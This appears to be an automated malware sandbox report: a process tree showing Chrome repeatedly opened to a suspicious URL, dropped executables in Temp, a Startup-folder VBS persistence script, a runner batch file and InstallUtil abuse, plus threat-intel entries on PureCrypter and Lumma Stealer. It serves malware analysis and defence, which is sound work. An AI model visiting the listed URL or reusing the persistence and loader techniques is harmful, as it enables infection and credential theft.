chrome.exe (PID: 16908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1988,i,9243568103408200411,14083164291610540486,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 16528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 17208 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1984,i,15419181765585057394,6670311027553153785,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 17484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 17872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1916 --field-trial-handle=2028,i,14704702612634137022,13283822498721106839,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 18088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 18284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1980,i,13800168806641850337,1252832294211567749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 17580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 18760 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1996,i,2440065999085773376,4668946962335946973,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 18984 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1992,i,8220830113635767741,8511822262946293777,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 19472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 19792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1156,i,5154185688367289602,11407614901677859174,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 19576 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 20216 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2004,i,13036272579540178643,1927237139647604030,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 20420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 14916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2008,i,3918962276335397993,18229504157229042942,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 20376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 20868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1972,i,10677569344053674716,7012595910923912148,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 21076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 21492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1980,i,1857441977012259282,17901089399641908308,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 21468 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 21620 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,7487110070847316896,5582251863534710150,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 21928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 22284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=2044,i,12705238517774536685,12117524317393481054,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 22040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1468 --field-trial-handle=1744,i,11295412607946737316,9054402318779687979,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 21812 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 22784 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2012,i,17020493693857119135,5398933278766730022,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 23032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 22564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

InstallUtil.exe (PID: 2872 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

2090621607.exe (PID: 12448 cmdline: "C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe" MD5: DABD794D5925E01CE2525D17795B56E1)

0717674af5.exe (PID: 6972 cmdline: "C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe" MD5: 3079517B64FB39F7AE3B94F9BA77F37F)

skotes.exe (PID: 16084 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: ED91FED1365AF41A389141266378CFC8)

4477947f1f.exe (PID: 8368 cmdline: "C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe" MD5: ACC11F67CF4889111898285909FFAC31)

wscript.exe (PID: 12008 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

TypeId.exe (PID: 13156 cmdline: "C:\Users\user\AppData\Roaming\TypeId.exe" MD5: CD97D09A95E215EFEE7A40605D6F734C)

cmd.exe (PID: 14192 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runner.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 14224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 8244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 14912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1984,i,14226800829201652385,10276475017906767513,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 14960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 15256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2012,i,10262160878012687441,15301380062293127654,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 15728 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1972,i,13595040883661267341,5298112090488421856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 14392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 15956 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2000,i,2165972809307344740,441943955686262932,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 16188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1932,i,3839464556416060848,13026013853573635163,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 16584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 14688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2024,i,14402791647519130237,17028031831812843495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 17476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 17900 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1172 --field-trial-handle=2012,i,5999604552990070426,13015335531134966904,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 18400 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8548 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1984,i,6342465718296439963,7063653370630127656,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 18472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1996,i,14624050743364290986,7834764246845110021,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 18884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 19252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2016,i,979502028839624058,13434839107830149959,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 19384 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 18992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1968,i,17173762750527162096,5079444058244670986,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 19540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 20196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=692 --field-trial-handle=2012,i,5788619707603885448,5455322155689001163,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 20428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 20492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2000,i,12795265570595023803,2009076803051335294,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 20884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 21260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2016,i,6451084168294191247,3303557760454261359,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=1992,i,13675614276573810495,14474061813535694310,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 21268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 21668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1168 --field-trial-handle=2028,i,13790200691533269936,14390321029282639858,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 21948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 21536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2008,i,418568306607350609,5560649611066257662,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 21612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 22976 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2064,i,3078106045737069916,8196321467453170590,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 23020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 23376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2012,i,15081096063514957223,8890955275309698934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 22744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

InstallUtil.exe (PID: 12568 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

2090621607.exe (PID: 16232 cmdline: "C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe" MD5: DABD794D5925E01CE2525D17795B56E1)

0717674af5.exe (PID: 7408 cmdline: "C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe" MD5: 3079517B64FB39F7AE3B94F9BA77F37F)

4477947f1f.exe (PID: 23512 cmdline: "C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe" MD5: ACC11F67CF4889111898285909FFAC31)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
PureCrypter	According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format	No Attribution	https://any.run/cybersecurity-blog/pure-malware-family-analysis/ https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/ https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/ https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter	https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
